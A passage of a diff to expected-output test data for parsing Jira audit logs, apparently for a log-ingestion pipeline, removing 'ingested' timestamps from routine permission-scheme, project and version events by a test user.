Issues\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":190000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -4213,7 +4155,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:20.169975988Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Modify Reporter\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Project Role\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.value\",\"key\":\"Value\",\"to\":\"Administrators\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":204000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -4288,7 +4229,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:20.169976750Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"View Voters and Watchers\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":208000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -4358,7 +4298,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:20.169977477Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Manage Watchers\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Project Role\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.value\",\"key\":\"Value\",\"to\":\"Administrators\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":210000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -4433,7 +4372,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:20.169978281Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Edit All Comments\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Project Role\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.value\",\"key\":\"Value\",\"to\":\"Administrators\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":212000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -4508,7 +4446,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:20.169979028Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Edit Own Comments\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":215000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -4578,7 +4515,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:20.169979766Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Delete All Comments\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Project Role\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.value\",\"key\":\"Value\",\"to\":\"Administrators\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":217000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -4653,7 +4589,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:20.169980492Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Delete Own Comments\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":219000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -4723,7 +4658,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:20.169981240Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Delete All Attachments\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Project Role\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.value\",\"key\":\"Value\",\"to\":\"Administrators\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":221000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -4798,7 +4732,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:20.169982037Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Delete Own Attachments\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":223000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -4868,7 +4801,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:20.169982878Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Edit Own Worklogs\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":225000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -4938,7 +4870,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:20.169983677Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Edit All Worklogs\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Project Role\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.value\",\"key\":\"Value\",\"to\":\"Administrators\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":227000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -5013,7 +4944,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:20.169984414Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Delete Own Worklogs\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":229000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -5083,7 +5013,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:20.169985168Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Delete All Worklogs\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Project Role\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.value\",\"key\":\"Value\",\"to\":\"Administrators\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":231000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -5158,7 +5087,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:20.169985913Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"View Read-Only Workflow\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":233000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -5228,7 +5156,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:20.169986640Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Transition Issues\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":235000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -5298,7 +5225,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:20.169987372Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"View Development Tools\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":236000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -5368,7 +5294,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:20.169988217Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Manage Sprints\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":239000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -5438,7 +5363,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:20.169988949Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Start/Complete Sprints\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":241000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -5508,7 +5432,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:20.169989685Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Edit Sprints\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":243000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -5590,7 +5513,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.removed.from.project", - "ingested": "2021-12-24T00:58:20.169990436Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"test\",\"type\":\"PROJECT\"},{\"id\":\"0\",\"name\":\"Default Permission Scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme removed from project\",\"actionI18nKey\":\"jira.auditing.permission.scheme.removed.from.project\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"175.16.199.1\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":249000000},\"version\":\"1.0\"}", "type": [ "deletion" @@ -5659,7 +5581,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.added.to.project", - "ingested": "2021-12-24T00:58:20.169991165Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"test\",\"type\":\"PROJECT\"},{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme added to project\",\"actionI18nKey\":\"jira.auditing.permission.scheme.added.to.project\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":266000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -5722,7 +5643,6 @@ }, "event": { "action": "jira.auditing.project.created", - "ingested": "2021-12-24T00:58:20.169991897Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"test\",\"type\":\"PROJECT\"},{\"id\":\"JIRAUSER10000\",\"name\":\"test.user\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"Project created\",\"actionI18nKey\":\"jira.auditing.project.created\",\"area\":\"LOCAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"projects\",\"categoryI18nKey\":\"jira.auditing.category.projects\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"i18nKey\":\"common.words.name\",\"key\":\"Name\",\"to\":\"test\"},{\"i18nKey\":\"common.words.key\",\"key\":\"Key\",\"to\":\"TEST\"},{\"i18nKey\":\"common.concepts.description\",\"key\":\"Description\",\"to\":\"\"},{\"i18nKey\":\"common.concepts.projectlead\",\"key\":\"Project Lead\",\"to\":\"test.user\"},{\"i18nKey\":\"admin.projects.default.assignee\",\"key\":\"Default Assignee\",\"to\":\"Unassigned\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":297000000},\"version\":\"1.0\"}", "type": [ "creation" @@ -5816,7 +5736,6 @@ }, "event": { "action": "jira.auditing.project.roles.changed", - "ingested": "2021-12-24T00:58:20.169992629Z", "original": "{\"affectedObjects\":[{\"id\":\"10100\",\"name\":\"Developers\",\"type\":\"PROJECT_ROLE\"},{\"id\":\"10000\",\"name\":\"test\",\"type\":\"PROJECT\"}],\"auditType\":{\"action\":\"Project roles changed\",\"actionI18nKey\":\"jira.auditing.project.roles.changed\",\"area\":\"LOCAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"projects\",\"categoryI18nKey\":\"jira.auditing.category.projects\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"i18nKey\":\"admin.common.words.users\",\"key\":\"Users\",\"to\":\"JIRAUSER10000\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":506000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -5886,7 +5805,6 @@ }, "event": { "action": "jira.auditing.version.created", - "ingested": "2021-12-24T00:58:20.169993362Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Version 1.0\",\"type\":\"VERSION\"},{\"id\":\"10000\",\"name\":\"test\",\"type\":\"PROJECT\"}],\"auditType\":{\"action\":\"Project version created\",\"actionI18nKey\":\"jira.auditing.version.created\",\"area\":\"LOCAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"projects\",\"categoryI18nKey\":\"jira.auditing.category.projects\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"i18nKey\":\"common.words.name\",\"key\":\"Name\",\"to\":\"Version 1.0\"},{\"i18nKey\":\"version.releasedate\",\"key\":\"Release date\",\"to\":\"2021-11-14\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":521000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -5973,7 +5891,6 @@ }, "event": { "action": "jira.auditing.version.released", - "ingested": "2021-12-24T00:58:20.169994174Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Version 1.0\",\"type\":\"VERSION\"},{\"id\":\"10000\",\"name\":\"test\",\"type\":\"PROJECT\"}],\"auditType\":{\"action\":\"Project version released\",\"actionI18nKey\":\"jira.auditing.version.released\",\"area\":\"LOCAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"projects\",\"categoryI18nKey\":\"jira.auditing.category.projects\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"175.16.199.1\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":535000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -6036,7 +5953,6 @@ }, "event": { "action": "jira.auditing.version.created", - "ingested": 